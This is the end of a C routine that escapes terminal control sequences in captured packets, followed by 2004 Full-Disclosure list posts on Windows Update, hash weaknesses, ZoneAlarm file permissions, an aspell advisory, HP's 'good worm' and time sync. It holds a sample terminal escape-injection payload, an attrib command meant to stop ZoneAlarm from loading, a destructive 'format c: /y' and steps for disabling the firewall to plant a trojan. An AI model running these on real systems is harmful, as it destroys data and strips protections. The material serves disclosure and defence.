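            if (pos + len < outsz) {
                memcpy(out + pos, rep, len);
                pos += len;
            } else {
                full = 1;
            }
        }
    }
    if (outsz > 0)
        out[pos] = '\0';
    return needed;
}

/* 1 if printing the payload raw would hand the terminal a control
 * sequence, 0 if it is safe to print as-is. */
int payload_has_terminal_controls(const unsigned char *in, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (is_terminal_control(in[i]))
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed sample: ordinary request text followed by the
     * title-set / title-report pair the posted exploit relies on. */
    const unsigned char pkt[] =
        "GET / HTTP/1.0\r\n" "\x1b]2;;id\x07" "\x1b[21t";
    char safe[256];
    size_t n = sizeof pkt - 1;   /* drop the string's NUL */

    printf("raw payload has terminal controls: %d\n",
           payload_has_terminal_controls(pkt, n));
    sanitize_payload(pkt, n, safe, sizeof safe);
    printf("%s\n", safe);
    return 0;
}
```

A sniffer would call sanitize_payload() on every payload it is about to print and size the output buffer at four times the payload length plus one, the worst case when every byte is a control. Escaping rather than dropping bytes keeps the capture honest: the operator sees that an ESC ] 2 ; ... BEL sequence was on the wire, which is itself a useful detection signal.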


Re: [Full-Disclosure] Windows Update

2004-08-23 Thread Michael Schaefer
It looks like windows update requires Automated Updates to be set to 
automatic startup, but does not require the process to actually be 
running...

So the statement that they are "required" is obviously false.
As a work around, I can manually change the startup status, do the 
windows update, then change the startup status back to manual.

Seriously annoying, but doable.



[Full-Disclosure] Re: Re-write with security in mind all ops.

2004-08-23 Thread Feher Tamas
>It wouldn't be that hard, just no unencrypted traffic
>and no unencrypted interprocess communication.
>Spammers and bozos would have to work a lot harder

Except for important crypto was broken... nothing is safe:

http://www.computerworld.com/printthis/2004/0,4814,95343,00.html

"Opinion: Cryptanalysis of MD5 and SHA: Time for a new standard
by Bruce Schneier, Counterpane, 19 Aug 2004

Crypto researchers report weaknesses in common hash functions

At the Crypto 2004 conference in Santa Barbara, Calif., this week,
researchers announced several weaknesses in common hash functions.
These results, while mathematically significant, aren't cause for
alarm. But even so, it's probably time for the cryptography community
to get together and create a new hash standard.

One-way hash functions are a cryptographic construct used in many
applications. They are used with public-key algorithms for both
encryption and digital signatures. They are used in integrity checking.
They are used in authentication. They have all sorts of applications in
a great many different protocols. Much more than encryption algorithms,
one-way hash functions are the workhorses of modern cryptography.

In 1990, Ron Rivest invented the hash function MD4. In 1992, he
improved on MD4 and developed another hash function: MD5. In 1993, the
National Security Agency published a hash function very similar to MD5,
called the Secure Hash Algorithm (SHA). Then in 1995, citing a newly
discovered weakness that it refused to elaborate on, the NSA made a
change to SHA. The new algorithm was called SHA-1. Today, the most
popular hash function is SHA-1, with MD5 still being used in older
applications.

One-way hash functions are supposed to have two properties. One,
they're one-way. This means that it's easy to take a message and
compute the hash value, but it's impossible to take a hash value and
re-create the original message. (By "impossible," I mean "can't be done
in any reasonable amount of time.") Two, they're collision-free. This
means that it's impossible to find two messages that hash to the same
hash value. The cryptographic reasoning behind these two properties is
subtle, and I invite curious readers to learn more in my book Applied
Cryptography.

Breaking a hash function means showing that either -- or both -- of
those properties aren't true. Cryptanalysis of the MD4 family of hash
functions has proceeded in fits and starts over the past decade or so,
with results against simplified versions of the algorithms and partial
results against the whole algorithms.

This year, Eli Biham and Rafi Chen, and separately Antoine Joux,
announced some pretty impressive cryptographic results against MD5 and
SHA. Collisions have been demonstrated in SHA. And there are rumors,
unconfirmed at this writing, of results against SHA-1.

The magnitude of these results depends on who you are. If you're a
cryptographer, this is a huge deal. While not revolutionary, these
results are substantial advances in the field. The techniques described
by the researchers are likely to have other applications, and we'll be
better able to design secure systems as a result. This is how the
science of cryptography advances: We learn how to design new algorithms
by breaking other algorithms. In addition, algorithms from the NSA are
considered a sort of alien technology: They come from a superior race
with no explanations. Any successful cryptanalysis against an NSA
algorithm is an interesting data point in the eternal question of how
good they really are in there.

As a user of cryptographic systems -- as I assume most readers are --
this news is important, but not particularly worrisome. MD5 and SHA
aren't suddenly insecure. No one is going to be breaking digital
signatures or reading encrypted messages anytime soon with these
techniques. The electronic world is no less secure after these
announcements than it was before.

But there's an old saying inside the NSA: "Attacks always get better;
they never get worse." These techniques will continue to improve, and
probably someday there will be practical attacks based on these
techniques.

It's time for us all to migrate away from SHA-1.

Luckily, there are alternatives. The National Institute of Standards
and Technology (NIST) already has standards for longer -- and
harder-to-break -- hash functions: SHA-224, SHA-256, SHA-384 and
SHA-512. They're already government standards and can already be used.
This is a good stopgap, but I'd like to see more.

I'd like to see NIST orchestrate a worldwide competition for a new hash
function, like it did for the new encryption algorithm, Advanced
Encryption Standard, to replace Data Encryption Standard. NIST should
issue a call for algorithms and conduct a series of analysis rounds,
where the community analyzes the various proposals with the intent of
establishing a new standard.

Most of the hash functions we have and all the ones in widespread use
are based on the general principles of MD4. Clearly

Re: [Full-Disclosure] Re-write with security in mind all ops.

2004-08-23 Thread Clairmont, Jan M
Having worked on NATO security specs and other highly secured
networks, it wouldn't be that hard: just no unencrypted traffic
and no unencrypted interprocess communication. Spammers and bozos
would have to work a lot harder for their fun.

You can laugh all you want happy boy, but that is what is coming
next. Get used to it.

Jan Clairmont
Firewall Administrator/Consultant
(302) 323-3616

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Nick
FitzGerald
Sent: Friday, August 20, 2004 10:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write
code with security in mind


Clairmont, Jan M wrote:

> ...  So
> what is the alternative?
> 
> Go to a totally secure network computing system like the military?

Hahahahahahahahahahahahahaha...

...

Oh, you didn't think you were making a funny??


Regards,

Nick FitzGerald



RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro.

2004-08-23 Thread Todd Towles
No one would ever do that? That is up there on the possible scale with an
encrypted zip file that is mailed to a user, asking them to input the
word, open the zip and run the file. That would never happen... wait..
=)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Ron
DuFresne
Sent: Friday, August 20, 2004 3:10 PM
To: Matthew Farrenkopf
Cc: Todd Towles; [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm
pro.


yet, if I read this properly it wasn't simply an open e-mail attachment
issue was it, it was open attachment then make suggested changes to the
system issue wasn't it?  If I understood the problem, then it really
requires more than a simple luser, it requires the most stupid of lusers
for it to take.  and in that case, we're perhaps better off with them
DOS'ed?

thanks,

Ron DuFresne

>
> However, this would still make it prime for a DoS attack by the next 
> strain of e-mail virus.  And most users who are not knowledgeable 
> (those who would be opening the attachment in the first place) would 
> probably not understand why they, now, cannot connect to the Internet.
>
> Matt
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



[Full-Disclosure] ERRATA: [ GLSA 200406-14 ] aspell: Buffer overflow in word-list-compress

2004-08-23 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: aspell: Buffer overflow in word-list-compress
  Date: August 23, 2004
  Bugs: #53389
ID: 200406-14:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The previous security patch intended to fix this vulnerability was apparently
incorrect in that it counted the words rather than characters. This revision
fixes that. This was brought to our attention by Ludwig Nussel
<[EMAIL PROTECTED]>


Affected packages
=================

---
 Package  /   Vulnerable   /Unaffected
---
  1  app-text/aspell <= 0.50.5-r3 >= 0.50.5-r4


Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




Re: [Full-Disclosure] Windows Update

2004-08-23 Thread Michael Schaefer
Unless you have actual experience with Microsoft updates screwing up 
your systems...

Unless you care about actually understanding why your application 
suddenly stops working and have no idea that an update was rammed into 
your computer...

So you are right, as long as you are a totally irresponsible admin, this 
change is a good idea.


James Tucker wrote:
> There really should be no reason why you would want to disable the
> Automatic Updates service anyway, unless you are rolling out updates

Experience teaches again and again about the folly of men.


RE: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread Todd Towles
Microsoft has. It is called SMS. 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of The Central
Scroutinizer
Sent: Sunday, August 22, 2004 7:35 PM
To: Mailing List - Full-Disclosure
Subject: Re: [Full-Disclosure] The 'good worm' from HP

Would it not be better to have a standard secure backdoor provided by a
security package that could be downloaded or installed by disk and works
hand in hand with port scanning software, if this is really necessary. I
am surprised Microsoft have not released such a piece of software; maybe
a third party have.

Aaron

- Original Message -
From: "Todd Towles" <[EMAIL PROTECTED]>
To: "joe" <[EMAIL PROTECTED]>
Cc: "Mailing List - Full-Disclosure" <[EMAIL PROTECTED]>
Sent: Sunday, August 22, 2004 7:15 PM
Subject: RE: [Full-Disclosure] The 'good worm' from HP


>I hope it is a bad choice of words. He is a VP, should I say more?
>
> Even if it is a controlled worm that moves around in the internal
> network patching computers, it sounds like a very stupid idea.
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of joe
> Sent: Sunday, August 22, 2004 8:20 AM
> To: Todd Towles; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] The 'good worm' from HP
>
>> Allan is right. I didn't notice people calling it a worm.
>
>
> From the article at InfoWorld...
>
> We've been working with (customers) for the last month now," said Tony
> Redmond, vice president and chief technology officer with HP Services in
> an interview.
>
> "This is a good worm," said Redmond. "It's turning the techniques (of
> the attackers) back on them."
>
> Possibly he used a bad choice of words.
>
> I definitely agree though that you probably shouldn't be "infecting"
> machines to patch them. In order to patch through a hole like that you
> are running code through that hole and that is the same as infecting in
> my book, you just aren't propagating. You could still make the machine
> unstable or cause other issues. I think my preference would be something
> along the lines of what the NetSquid project is doing mentioned
> previously but be more aggressive. Sure have the feed from SNORT to
> actively go out and pop the machines currently sending bad traffic, but
> also scan for machines that *could* get infected and shut them down as
> well. That would be a good use of this tech HP is working on, simply
> identify the machines. However others have done the similar in terms of
> detection so that wouldn't be nearly as new and daring. They could do a
> good thing by making it fully supported by a big name, stable, quick,
> and part of an overall framework for protecting the network environment.
>
>  joe
>
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Todd
Towles
> Sent: Saturday, August 21, 2004 8:58 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] The 'good worm' from HP
>


Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread bipin gautam

--- Barrie Dempster <[EMAIL PROTECTED]> wrote:

> In reply to my own previous email, I assumed ZA
> would fail, as others
> have on this list, with an EVERYONE:DENY security
> policy, however this
> isn't the case.
> ZA 5.1 PRO Trial version will change this to
> EVERYONE:FULL for the
> duration of the program after which it will then
> change these settings
> back to the original EVERYONE:DENY. This throws out
> the DoS theory, but
> the permissions are still extremely permissive, if
> the "truevector
> driver" was to have issues with it's integrity
> checks then the files in
> this folder would be easily compromised.


not really, just simply, go to  internet log directory
and , do

..\..\Internet Logs\>attrib/s +h +s +r +a *.*

next time Zap'S "truevector driver" will fail to load.
when the pc reboots or zap restarts...

bipin

ps: thanks for the 'Rant's-&-Raves' regarding NTFS (O; 





RE: [Full-Disclosure] Windows Update

2004-08-23 Thread Todd Towles
The AU shouldn't be an issue for anyone running SUS or SMS. It is a pain to turn it
back on if you have already turned it off (my case) via corporate wide reg hack. But
that is my issue and easily fixable.

AU running in automatic mode will not install updates on its own, as long as you turn
the automatic feature off in the control panel. I saw this problem on the gold version
of XP. You tell it to not do automatic updates but the service starts up as automatic
and wastes CPU cycles and memory. That is why I put it to manual on all my computers on
the network. But with XP SP2 - WindowsUpdate won't work if the service is set to
manual. Great policy change from Microsoft?

As far as admins turning it off to stop updates, why don't you try a proxy? Don't good
admins use those?  Sure, once a user gets thru the proxy, an update could be installed
and that is a problem.

But I do understand the issue of automatic patching of systems. I was the primary SMS
Admin for my company before getting a new job. Updates should be released in a
controlled way in a corporate network.

Look at it this way. If you use SMS you don't need AU and can leave it to manual.
Therefore no local user can get to WindowsUpdate and you now have more control
over which patches are installed when and where.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ASB
Sent: Monday, August 23, 2004 8:02 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windows Update

Just because the Automatic Update service is enabled, doesn't mean that updates will 
be automatically "installed".  There are various options for configuration.

I require AU enabled because I'm using SUS, and I control when updates are available.

The automatic nature of the service is not an implicit evil.

-ASB

On Sat, 21 Aug 2004 19:56:14 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote:
> Umm, hold on a sec here...
> 
> (snip from "James Tucker"):
> > There really should be no reason why you would want to disable the  
> >Automatic Updates service anyway, unless you are rolling out updates  
> >using a centralised distribution system, in which case you would not 
> >need it anyway.
> 
> I believe you are missing one fundamental point: SPs and updates are 
> notorious for breaking something else. (Especially from Microsoft.) 
> Granted, if fixing a security weakness breaks something you're using, 
> then that aspect could have been written better. However, that still 
> doesn't fix it when an entire business network goes down and YOU are 
> the one responsible. I do not allow ANY automatic updates (except for 
> virus definitions) to run on ANY networks I am in charge of. I take 
> the time (like every good sysadmin should) to look over each update 
> before applying it so I know three things:
> 
> 1. What it's fixing/patching
> 2. Why it's fixing/patching it
> 3. What will be the end result of the fix/patch
> 
> If you would simply allow updates and SPs to have free reign over your
> system(s) without taking any time to look over those updates, you're 
> going to be one busy and irritated sysadmin. That is, if you still 
> have a job after a little bit.
> 
> ~G
> 
> P.S. Don't take my word for it. Look here:
> - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html
> - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1
> - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619
> - http://www.vnunet.com/news/1157279
> - Or, find the other 200+ articles by searching Google News
>for "disable automatic update sp2"  =)
> 
> 
> 
> On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker <[EMAIL PROTECTED]> wrote:
> > Here I found that I can have BITS and Automatic Updates in "manual", 
> > Windows Update works fine here. It may be a good idea to refresh the 
> > MMC console page, as you will probably find that at time the service 
> > had shut down if and when BITS was stopped prematurely (i.e. when it 
> > was in use).
> >
> > There really should be no reason why you would want to disable the 
> > Automatic Updates service anyway, unless you are rolling out updates 
> > using a centralised distribution system, in which case you would not 
> > need it anyway.
> >
> > If you are worried about system resources, you should look into how 
> > much the service really uses; the effect is negligable, in fact 
> > there is more impact if you select (scroll over) a large number of 
> > application shortcuts (due to the caching system) than if you leave 
> > Automatic Updates on. If you are worried about your privacy and you 
> > dont believe that the data sent back and forth has not been checked 
> > before, then you surely dont want to run Windows Updates ever. If 
> > you want to cull some real system resources and have not already 
> > done so, turn the Help and Support service to manual, that will save 
> > ~30mb on boot, up until the first use of XP help; this will stop 
> > help links from programs from forw

RE: [Full-Disclosure] Windows Update

2004-08-23 Thread joe
> What I see Microsoft as doing is pretty much forcing 
> everyone to turn on Automatic Windows Update.  Why 
> leave it as a control panel option, I've no clue.  
> Same with BIT (Background Intelligent Transfers.) 
> For the millions of users out there that are likely 
> subject to viruses, etc, I'm sure it will help make 
> things better, but for people who would fit into the 
> "power user" class, it's a real pain in the arse.

> I really object to this philosophy because it does 
> not let a person plan the downloading and installation 
> of updates - some of which will require a reboot.

No they aren't. If you don't want auto updates, you set it to no
autoupdates, like my machine is now. Then it won't do anything unless you go
out and tell it to. Of course the service is still running but if you are a
power user, you know how to disable the service and reenable when you want
to go get the updates. As I mentioned previously, this is kind of a pain,
but certainly isn't forcing you to have AU on and has no impact on your
planning of downloading and installing of updates. A power user knows it
only takes a single command line to stop and disable the WU service and
single command line to reenable and start it again. 


> What do large corporate installations of Windows do here?

Depends on the company. The large ones I have worked/talked with, 5k+ seats
to about 200k seats, use various methodologies for deploying software and
patches, from custom in house services to simple batch files to SMS to
Windows Update service either due to using SUS or using the Update Web Site.


> Do they run their own caches of the Windows updates?

In many cases yes. Depends on the deployment method. 

> Push out updates from servers rather than have clients pull?

In some cases yes. 

> Is it all done with SUS?

Nope, but many do.

> Is SUS usable on a single node, in place of WU?

SUS depends on the WU client.

> The help for the "Windows Update" web site suggests 
> that it is possible to get updates without Automatic Updates.  
> Is the help out of date or is there a way to still do it 
> without AU on ?

You go to the KB articles or security bulletins and download the qfe's
manually. In my last job as a Server Admin, there wasn't a single update in
3 years I pulled through Windows Update Web site. In fact the company
blocked that traffic at the firewall. I or our systems integration group
would check out the new issues and download the patch or get it from
Microsoft Support and then integrate it into our patching methodologies
(basically batch it up for silent install) and test it to make sure the
install wasn't damaging then test it for functionality then deploy it. The
client group would slap the patch package into the software deployment
system and it would zoom out to the local site servers where the local
admins would schedule the deployment to their local workstations.  

There is no hard fast answer to patch management. Many at the corporate
levels beat MS for that but then many others don't care as they already have
something be it shavlik, SMS, SUS, or something they have whipped up for
themselves from fancy batch files to interactive perl scripts to automatic
service/daemon like service scripts, to actual custom executables.
Personally I like the freedom of choice in how things can be deployed, I
certainly wouldn't want to be railroaded into a single methodology like you
misunderstand WU to be. 


  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed
Sent: Monday, August 23, 2004 6:52 AM
To: Security List
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windows Update

In some mail from Security List, sie said:
> 
> Went to windows update last night w/ XP Pro. 
> Redirected to the v5 version.  I was asked to install the new Windows 
> Update software...downloaded the WU software...copied the files...then 
> saw registering...kinda thinking that it was checking for a valid 
> registration or license.  No updates needed according to WU.  XP SP2 
> is not available via WU for XP Pro yet.
> 
> Now, I checked the Automatic Update service to see if it was turned 
> back start automatic as I always have it disabled.  Yup, it was set to 
> automatic and it was started.  I stop and disable automatic update 
> service, and try WU.  Get error stating that the automatic update 
> service must be enable to use WU now.  Has anybody else head of this?  
> Once again, we must have services that we do not want enable.  I can 
> not believe that they are forcing user to turn on the service to use 
> WU.

I discovered this when testing out v5beta and had to do a checkpoint
recovery to restore version 4.  If you don't install the latest Windows
Update software (if, for example, you have all Active X stuff set for
prompting and you say "no") then you don't even get to 1st base and Windows
Updates (via a convienient mechanism) are not available.
IMHO, this sucks big time.

RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)-WASTE OF TIME

2004-08-23 Thread Cassidy Macfarlane
ffs

Open a cmd, type 'format c: /y'

Omg, phone billy g, it's a massive DoS/vuln.

Get a grip bipin.  If a malicious user has command line access to your
system, 'zonealarm' is the last thing you should be worrying about.


-Original Message-
From: bipin gautam [mailto:[EMAIL PROTECTED] 
Sent: 23 August 2004 15:34
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm
pro. (ZA will fail to load)



--- Barrie Dempster <[EMAIL PROTECTED]> wrote:

> In reply to my own previous email, I assumed ZA
> would fail, as others
> have on this list, with an EVERYONE:DENY security
> policy, however this
> isn't the case.
> ZA 5.1 PRO Trial version will change this to
> EVERYONE:FULL for the
> duration of the program after which it will then
> change these settings
> back to the original EVERYONE:DENY. This throws out
> the DoS theory, but
> the permissions are still extremely permissive, if
> the "truevector
> driver" was to have issues with it's integrity
> checks then the files in
> this folder would be easily compromised.


not really, just simply, go to  internet log directory
and , do

..\..\Internet Logs\>attrib/s +h +s +r +a *.*

next time Zap'S "truevector driver" will fail to load.
when the pc reboots or zap restarts...

bipin

ps: thanks for the 'Rant's-&-Raves' regarding NTFS (O; 





RE: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread The Central Scroutinizer



> It's called
WindowsUpdate? That cannot be used locally/internally by an organization.

Aaron


Re: [Full-Disclosure] Safari/WebCore Content Sniffing

2004-08-23 Thread Jesse Ruderman
Mozilla does content sniffing on text/plain if the content includes 
control characters ("invalid text/plain content").  Is this incorrect?  
Is it a security hole -- for example, does it introduce XSS holes or 
allow executable files to be run without a proper warning?



Re: [Full-Disclosure] Windows Update

2004-08-23 Thread David Vincent
Darren Reed wrote:
> What I see Microsoft as doing is pretty much forcing everyone to turn
> on Automatic Windows Update.  Why leave it as a control panel option,
> I've no clue.  Same with BIT (Background Intelligent Transfers.)
> For the millions of users out there that are likely subject to viruses,
> etc, I'm sure it will help make things better, but for people who would
> fit into the "power user" class, it's a real pain in the arse.

I'm just annoyed that Microsoft now requires me to run another service
if I want their update website to work when I use it.  Turning off
automatic updates in the control panel doesn't do anything to the
service other than tell it to not poll the Microsoft site and tell me if
I am missing something.

> I really object to this philosophy because it does not let a person
> plan the downloading and installation of updates - some of which will
> require a reboot.

If you don't want to use Windows Update, you can always download each
patch manually from the links provided in their monthly security
bulletins.  You are subscribed to their bulletins right?  Once you have
each patch downloaded, you can indeed plan the rollout to your system,
don't forget you need a tool to check that your patches were installed
correctly, like MBSA or HFNETCHK.

> What do large corporate installations of Windows do here?

SUS, soon to be WUS.

> Do they run their own caches of the Windows updates?

Yes, SUS, soon to be WUS.

> Push out updates from servers rather than have clients pull?

Well, no.  The clients really pull it from the SUS Server, which pulls
it from Microsoft.

> Is it all done with SUS?

Yes.

> Is SUS usable on a single node, in place of WU?

Define node.  On a workstation?  No, you need a Windows Server (2000 or
2003) to run SUS from.  You also cannot visit the SUS site from a
workstation using IE and do a scan like you do with Windows Update.  You
have to schedule things so the client will poll the server for updates
it is missing.

> The help for the "Windows Update" web site suggests that it is
> possible to get updates without Automatic Updates.  Is the help
> out of date or is there a way to still do it without AU on ?

Subscribe to the Monthly Security bulletins and download the patches
using the links provided there.  Or go to
http://www.microsoft.com/security and click on the "More security
updates..." link.  I think you can take it from there.

> If you were a conspiracy theorist, you'd say this was Microsoft's way
> of being able to do more automatic updates before announcing a security
> vulnerability and mitigate the impact of 0-day exploits (developed through
> reverse engineering of changes.)

No, if I were a conspiracy theorist I'd say Microsoft was pushing
Automatic Updates so they could install secret backdoors on everyone's
computers and then sneak in during the night to steal CPU cycles to
donate to their friends from Betelgeuse 5 who need the help to plan
their takeover of Planet Earth.

-d


Re: [Full-Disclosure] SOHO firewalls trust everyone? WAS Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread Barrie Dempster
(BoneMachine you forgot to hit "reply all", the list didn't get your
email.)

[ scroll down for my reply ]


On Mon, 2004-08-23 at 15:04, BoneMachine wrote:
> Hello
> Bipin showed that a method to prevent ZA from loading is to change the attributes of the
> files within %windir%/Internet Logs using the attrib command.
> This is obviously something different than changing the ACL of the directory.
> Have you (or anybody on the list for that matter) tested changing the attributes to
> cause a DoS?
> Also, if I follow the discussion correctly, it is possible to delete or move the
> config file from the directory. Will this result in a DoS or is some overly
> permissive default configuration created when the config files are moved from the
> directory?
> 
> Thank you for your time,
> Bone Machine
> 
> ---
> "I can hardly wait Betty" - The Pixies

I've tried deleting the files. The only deletable files are BACKUP.RDB
and ZALog.txt when the program is running; all the rest are locked by
the running process, but if you stop the process you can modify any file
you like. The files are replaced on reload but my settings disappear: my
firewall rules and other configuration modifications and so on all
defaulted.

This is not an issue for ZA? Any user on my system can modify my
configuration if at any point ZA is shut down or crashes?

I've also tried controlling ZA as a normal user, no wait, a RESTRICTED
user (as per the Windows 2000 add user wizard). I was able to switch the
firewall off completely and change the settings, so I don't need to
delete or modify any files; I can break the firewall as anyone. ZA is
designed to be a home/office product; ZoneLabs assume that everyone in
the home or office should be allowed to mess with the firewall from a
convenient location in the system tray. This is how most SOHO firewalls
work. *!*_THIS IS BAD BAD BAD!_*!*

MS have moved their OS to a more multi-user orientated approach with
versions starting at 2k (although they still are determined to give the
first user admin privs as well as the admin user), but most of the
products running on the OS, such as this _security_ product, still treat
it as a one-user system; privilege separation is an alien concept to
them. This makes many of the firewall's features useless.

For example, if I want to stick a trojan on a ZA machine I know that as
any user I can.. 
1. Stop the firewall process
2. Install my trojan
3. Set the firewall to insanely open
4. Have my merry way owning this user spamming the zonelabs security
team with "how to rip off your users with a fake security program"
emails and DoSing SCO, just for fun.

The user won't suspect a thing because ZA didn't pop up and say
"
Hello, you've been owned, would you like evil_trojan.exe to rape the
internet on your behalf?
[DENY] [ALLOW] 
". 

Maybe someone from ZoneLabs can explain to me the usefulness of keeping
a list of programs allowed to access the net or a list of allowed
outgoing ports if an attacker can modify this list at will without even
breaking out of a restricted account? I don't see your logic; why not
just switch off the outgoing filter altogether? It seems like wasted CPU
cycles which could be much better utilised by the trojan that previously
infected the system and trivially bypassed the _firewall_.

I don't want to single out ZA for this as I know other firewalls have
the same setup. They are utterly useless at protecting from
ANYTHING on the inside; the outbound filtering is broken if the rogue
program can modify it at will. Security programs MUST be separated from
the regular users on the system, or they provide no real protection at
all.

The argument against this could be "but a single user system will only
have one user and they will have admin privs anyway so it wouldn't
matter".

My answer to that would be: the user only has admin privileges because
of bad security design on the part of the OS vendor. Their design being
broken isn't a valid reason to duplicate it. As a vendor of security
products, ZoneLabs and their peers as SOHO firewall developers should
educate the user in the proper methods for securing their system.

A false sense of security may benefit the pockets of the vendors'
shareholders, but it has a detrimental effect on their clients. IMO this
is wilful negligence and a sure-fire sign you should avoid the vendor's
products.


-- 
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]




Re: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread Bart . Lansing
I'm fairly sure I disagree with you, Nick.  I don't believe we need 
Brontchev's paper in hand or head to discuss whether or not 
self-replicating, active, "beneficial code" is a good idea or not. Contrary 
to the tone of some of your posts,  many of us are fairly bright, 
reasonably well educated, and capable of forming our own opinions without 
someone else framing the debate for us.  In fact, Brontchev's thoughts on 
constructing/distributing a beneficial virus come down, in the end, to 
just being a publish and subscribe software distribution method...hardly 
revolutionary or ground-breaking even when he wrote it.

As relates specifically to HP/Active Countermeasures, however:

HP is looking to market/deploy this as a managed tool, most likely as a 
bolt-on to OpenView, not "unleash" it on the net...more to the point, it 
is not viral (as described, in fact, in Bontchev's paper...so let's not 
quibble about that definition).  As a managed systems tool, confined to 
pre-defined systems, it matters not a whit what Bontchev's paper has to 
say.  If it's a functional, efficient tool to assist in keeping systems 
secure and patched it's going to be used.  In the case of this specific 
product, I think that several posters here need to do a little more 
research into the product.   It's a scanner, based on reported/compiled 
vulnerabilities, coupled with some rules-based capabilities such as taking 
a machine off a network, forcing patches, etc.  I think too many people 
here (and elsewhere) heard the term "good worm" and leapt to a series of 
conclusions so quickly that they never bothered to find out what it was 
that they were talking about.

Bart Lansing
Manager, Desktop Services
Kohl's IT




Nick FitzGerald <[EMAIL PROTECTED]>
Sent by: [EMAIL PROTECTED]
08/20/2004 09:14 PM
Please respond to: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] The 'good worm' from HP

Maarten wrote:

> Stuff like counter-attacking has been discussed often, whether in large
> open forums such as FD or in more private circles.  Mostly, people were too
> concerned to open themselves up for huge lawsuits and or for prosecution
> even, but now that an important influential company like HP is suggesting
> (building) it, this may well signify an important shift in the fight
> against malware.  I, for one, welcome the initiative...

You need to read Vesselin Bontchev's classic "Are 'Good' Viruses Still 
a Bad Idea?" paper before you can even begin to enter this debate.  And 
if you think the age of that paper automatically disbars it from 
contemporary discussion, the reason there are no more recent papers 
worth reading is because no-one has meaningfully challenged Bontchev's 
position since that paper was written.

I hope the HP folk have read it and thought very carefully about all 
this...  (Sadly the media reports are too "light and fluffy" to make 
anything sensible of what HP is really proposing.)


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



Re: [Full-Disclosure] Re: Fwd: Re: FullDisclosure: Security aspects of time synchronization infrastructure

2004-08-23 Thread stephane nasdrovisky




[EMAIL PROTECTED] wrote:

> Depending upon the criticality of the time sensitive applications on
> the network, you might want to reconsider the use of "radio clocks"
> and especially "GPS clocks".
>
> [...]
>
> For a fixed installation detecting if someone is dinking the gps signal
> is trivial.  The unit starts thinking it is not in Kansas anymore.


As far as I can remember, the GPS is not accurate ... during US raids
(i.e. against Iraq) I could not tell if time is affected or if it only
reduces the precision of the location (50-20 meters during normal
operation, 100-1000 meters during raids). Anyway, I use a couple of
internet & free NTP services (my ISP, some European & US labs,
...)  If all the servers are compromised, I'm too (as far as time and I
are concerned, I want my whole network to be synchronized, I don't
really care for the real time; before configuring a remote NTP server,
there was only a 'virtual' time (my watch), which was enough for my
logs); if only a few are, I can see there's a difference in the timing
they provide (which, anyway, I don't care about).

In Germany (which means anywhere between Spain and Russia), there is an
official radio clock (known as DCF-77) which does not suffer the GPS
limitation (this is not a military toy).  As an official clock (used
for synching administrations, parking payments, ...) it has to be up
and give the official accurate time 24-7. You (or at least I) can be
confident in this time. Unfortunately, most receivers do not work in
machine rooms (too much ECM noise; sometimes the building is
radio-protected, ...); you have to put your receivers (yes, one is not to
be considered reliable) outside your building!

These radio clocks are easier to corrupt than GPS (plain old FM against
